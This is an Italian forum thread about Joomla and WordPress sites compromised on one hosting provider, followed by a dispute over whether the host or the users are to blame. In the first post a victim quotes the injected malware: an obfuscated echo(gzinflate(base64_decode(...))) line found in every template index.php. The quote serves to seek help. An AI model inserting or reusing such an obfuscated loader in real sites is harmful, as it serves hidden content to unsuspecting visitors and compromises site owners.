Attacco su Joomla e vari hosting

[Flaterik]

Salve a tutti, alcuni miei siti (Quasi tutti a dire il vero) su hosting isola felice ed altri , su piattaforma Joomla 1.5 piuttosto che 2.5 sono stati bucati
Questo il codice
L'attacco ha colpito tutti i file index.php di tutti i template.

Soluzioni per questo problema?

Codice: [Seleziona]

#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9hynS4aZkbT2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9xnfLSRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0BH6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUes5lRL+6rv6dCyCQ9e8BjBYVeoJUPMarENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#

[mau_develop]

hai detto tante cose, non hai detto la tua versione di joomla e se tutte le estensioni erano aggiornate.

Le soluzioni si trovano se si conosce interamente il problema, se qualcosa è sottinteso o non detto... fatica inutile.

cmq la sez giusta è "Sicurezza" dove in testa trovi un post con 6400 persone col tuo problema

M.

[Flaterik]

Si, siti aggiornati . Le versioni, 2.5.4  1.5.26
Per i componenti no, qualcuno poteva non essere aggiornato a dire il vero.
grazie comunque per la risposta, vado su sicurezza

[mau_develop]

hai ja_purity vecchio sulla 1.5?

M.

[Flaterik]

No, su uno di questo ho i l 2 di Ja_purity ma è l'unico che ha superato indenne l'attacco

Ho un sito con Wordpress e ho avuto lo stesso identico problema!

[Zapan]

Non vorrei faar polemica, ma anche un mio sito, hostato sull'isola felice, è "bucato": la cosa è successa allo scadere del contratto, invece della pagina di cortesia, è apparsa una pagina contenente spam.

Brava grande A, dopo i black out degli anni scorsi ora ti bucano i server.

[tomtomeight]

@zapan
Perchè vieni allora a farla quì, mica è la sezione degli sfoghi & C. e cosa c'entra il forum col tuo hoster? Mica avrai scambiato la pagina pubblicitaria che ogni servizio hosting inserisce quando alla scadenza non si rinnova il dominio con quello che chiami spam. In ogni caso le rimostranze vanno fatte alla fonte del servizio, grazie.

[Zapan]

No non ho confuso nulla, la pagina era spam.
Ho scritto quì perchè anche questo utente aveva una pagina hostata sullo stesso provider. probabilmente hanno avuto problemi di sicurezza visto che anche il periodo era quello.

Lo scopo del mio messaggio era quello di far stare in campana utenti che potrebbero affidare la loro attività ad uno dei provide4r più publicizzati ma a quanto pare, meno sicuri.

[tomtomeight]

Beh questa è una tua opinione e ti ripeto in questo forum non è consentito discutere di servizi commerciali nè tantomeno venire a lamentarsi, diffamare o quant'altro per essi, ti invito ad automoderarti, di nuovo grazie.

[mau_develop]

Lo scopo del mio messaggio era quello di far stare in campana utenti che potrebbero affidare la loro attività ad uno dei provide4r più publicizzati ma a quanto pare, meno sicuri.
-----------------------------------------------------------------------------
come fai a far stare in campana gli utenti se non sai nemmeno cosa è successo e perchè?

M.

[Zapan]

Sapere cosa è succeso e perchè non è sicuramernte facile, nemmeno cheidendo al provider che ignora le mie e mails (daltronde ora non sono più loro cliente).
Sembra almeno sospetto che sia io che Flaterik abbiamo affidato il nostor sito allo stesso operatore e ci siamo ritrovati con lo stesso problema lo stesso periodo.

Con questo chiudo.

[mau_develop]

Sembra almeno sospetto che sia io che Flaterik abbiamo affidato il nostor sito allo stesso operatore e ci siamo ritrovati con lo stesso problema lo stesso periodo.
----------------------------------------------------

..tu e flaterik? ... magari! ... moooolti di più, ma per accusare bisogna avere i dati per farlo altrimenti... aria fritta!

M.

[Zapan]

io non voglio accusare ma si fa presto a pensar male!

come si dice 2 indizzi sono quasi una prova certa.

[tomtomeight]

E non ti passa proprio per la testa che potrebbe essere colpa di un tuo o vostro inconsapevole errore no eh, si fa più presto ad accusare. Prove ci vogliono prove prima di pensar male e poi venire ad accusare. Con questo non voglio difendere nessuno, figuriamoci se hanno bisogno di essere difesi quì, E' solo una questione di correttezza e correttamente vorrei che la flame  finisse quì ad evitare di chiudere questo post, grazie e proccupiamoci di esternare solo dei servizi ed estensioni free, grazie.

[giusebos]

Certo che l'umiltà di dire "forse c'è qualcosa che ho sbagliato" sono in pochi ad avercela in questo forum.

Tutti hanno la certezza matematica di aver fatto tutto con il giusto rigore e criterio.....


Per vostra informazione, parlo ai 2 utenti che hanno avuto lo stesso problema; Non ho avuto nessun problema negli utimi mesi (forse anni) riguardo le cose che lamentate con quel provider.

Ci sono impostazioni specifiche da configurare con certi hoster, impostazioni che devono essere impostate dagli utenti dopo che hanno LETTO una 20ina di righe di istruzioni, cosa che per esperienza non fa nessuno, compromettendo installazione e sicurezza.

Per voi consiglio un servizio di hosting dedicato a joomla, così non dovrete leggere niente e tutto funzionerà sempre o quasi.

[mau_develop]

Certo che l'umiltà di dire "forse c'è qualcosa che ho sbagliato" sono in pochi ad avercela in questo forum.
----------------------------------------------------------------------------------------------------------
...mah..sai... a volte è la vita stessa a punire questo atteggiamento perchè comunque all'hoster gliene frega nulla dei tuoi problemi e se cambi servizio li hai comunque.

Risultato...sempre problemi tuoi sono...poi se vuoi dai la colpa al mondo... intanto lui gira...

M.

[Flaterik]

Scusate non era mia intenzione scatenare un vespaio.
Comunque c'e' poco da dire. Le pagine che avevo nell'isola e ancora UNDER CONSTRUCTION con il loro messaggio fatto dal fornitore stesso, quindi pagine senza componenti o altro, sono TUTTE BUCATE.

Credo che questo ponga fine alla disputa.

[Flaterik]

Certo che l'umiltà di dire "forse c'è qualcosa che ho sbagliato" sono in pochi ad avercela in questo forum.

Tutti hanno la certezza matematica di aver fatto tutto con il giusto rigore e criterio.....


Per vostra informazione, parlo ai 2 utenti che hanno avuto lo stesso problema; Non ho avuto nessun problema negli utimi mesi (forse anni) riguardo le cose che lamentate con quel provider.

Ci sono impostazioni specifiche da configurare con certi hoster, impostazioni che devono essere impostate dagli utenti dopo che hanno LETTO una 20ina di righe di istruzioni, cosa che per esperienza non fa nessuno, compromettendo installazione e sicurezza.

Per voi consiglio un servizio di hosting dedicato a joomla, così non dovrete leggere niente e tutto funzionerà sempre o quasi.

Tralaltro ho specificato che non avevo componenti completamente aggiornati ed ho fatto il mea culpa. Salvo poi scoprire che le pagine PHP fatte da loro come pagine temporanee erano a loro volta BUCATE. Di conseguenza non credo a questo punto , che sia colpa di Joomla non aggiornato